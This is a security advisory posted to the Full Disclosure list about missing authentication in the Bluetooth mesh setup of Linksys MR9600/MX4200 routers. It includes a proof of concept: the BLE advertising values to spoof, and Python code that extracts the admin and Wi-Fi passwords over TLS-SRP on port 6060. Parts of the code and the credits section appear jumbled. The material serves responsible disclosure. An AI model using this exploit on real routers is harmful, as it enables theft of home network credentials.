[FD] [SYSS-2025-002] Linksys MX9600/MX4200 - Missing Authentication for Critical Function

[Christian Zäske via Fulldisclosure]

Advisory ID:               SYSS-2025-002
Product:                   MR9600, MX4200 (and potentially others)
Manufacturer:              Linksys

Tested Version(s):         1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200

Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2025-03-18
Solution Date:             -
Public Disclosure:         2026-02-12
CVE Reference:             Not yet assigned
Author of Advisory:        Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."

Due to missing authentication, a user with physical access to the device
can misuse the mesh functionality to add a new mesh device to the network
to gain access to sensitive information, including the password for admin
access to the web interface and the Wi-Fi passwords.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MX4200 (and other models) provides the functionality to add
other devices to the mesh network. One method to add such a device uses
a Bluetooth connection initiated by pressing the reset button quickly
five times.

This makes the router search for nearby Bluetooth Low Energy (BLE) devices
with specific services and characteristics. After such a device is found,
the router will connect to it and send credentials for a hidden Wi-Fi
network as well as a TLS-SRP username and password. This information
can be used to connect to the hidden Wi-Fi and a service running on TCP
port 6060, which accepts a TLS-SRP connection using the given
credentials.

By sending a binary hello message, followed by a so-called "sync request",
the service will answer with sensitive data, including the password for
admin access to the web interface and the Wi-Fi passwords.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To be recognized as a Linksys mesh device over BLE, the correct data has
to be advertised. This includes the following:

  - Flags: 0x06
  - Manufacturer specific data: 0x5C00 0x0000

  - Complete local name: Linksys

Additionally, the following service has to be present with the specified
characteristics:

  Service UUID: 00002080-8eab-46c2-b788-0e9440016fd1

  Characteristics 1:
    UUID: 00002081-8eab-46c2-b788-0e9440016fd1
    Properties: READ, WRITE, NOTIFY
    Permissions: READABLE, WRITABLE

  Characteristics 2:
    UUID: 00002082-8eab-46c2-b788-0e9440016fd1
    Properties: READ, WRITE, NOTIFY
    Permissions: READABLE, WRITABLE

After the reset button on the MX4200 is pressed quickly five times,
it will connect to the advertising device and write the data containing
the SSID and passphrase of the hidden Wi-Fi network as well as the
TLS-SRP username and password into the second characteristic.

After this data is received and a Wi-Fi connection to the hidden
network is established, the following Python code, using the
"tlslite-ng" library, can be used to connect to the service running on
TCP port 6060 and to send the sync request:

  from socket import *
  from tlslite.api import *

  sock = socket.socket(AF_INET, SOCK_STREAM)
  sock.connect(("192.168.1.1", 6060))

  conn = TLSConnection(sock)
  conn.handshakeClientSRP(srp_username, srp_pass)

conn.sendall(bytes.fromhex("4f53435479e0b43120fcf435000000600000"))


  data = ""
  msg = connection.recv(1024)
  while msg:
      data = data + msg.hex()
      msg = connection.recv(1024)

  data = bytes.fromhex(data[36:-2])
  data = data.decode("utf8")
  json_data = json.loads(data)
  print(json.dumps(json_data, indent=2))

The returned data is shown in the following:

  {
    "ADMIN": {
      "syscfg": [
        {
          "device::admin_password": "AdminPassword+1"
        }
      ],
      [...]
    },
    "WLAN": {
      "syscfg": [
        {
          "device::wps_pin": "63091700"
        },
        [...]
        {
          "wl0_passphrase": "WiFiPassword"
        },
        {
          "wl0_security_mode": "wpa2-personal"
        },
        {
          "wl0_ssid": "LinksysRD"
        },
        [...]
      ],
    },
    [...]
  }

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-11-11: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2025-06-24: Manufacturer information: vulnerability will not receive fix
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-002
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-002.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS
GmbH.

E-Mail: christian.zae...@syss.de

Affected Version(s):       1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 (and potentially others) Vulnerability Type:        Missing Authentication for Critical Function (CWE-306)   - Complete list of service class UUIDS: 00002080-8eab-46c2-b788-0e9440016fd1   conn.sendall('{"version": "0.1", "type": "sync_request", "client_id": "FBFA9E31-BE8C-4B63-A0BE-E89F80B304EA"}'.encode('utf8')) Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc

Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

OpenPGP_0x7B00D164A32F9AC9.asc
Description: OpenPGP public key

OpenPGP_signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/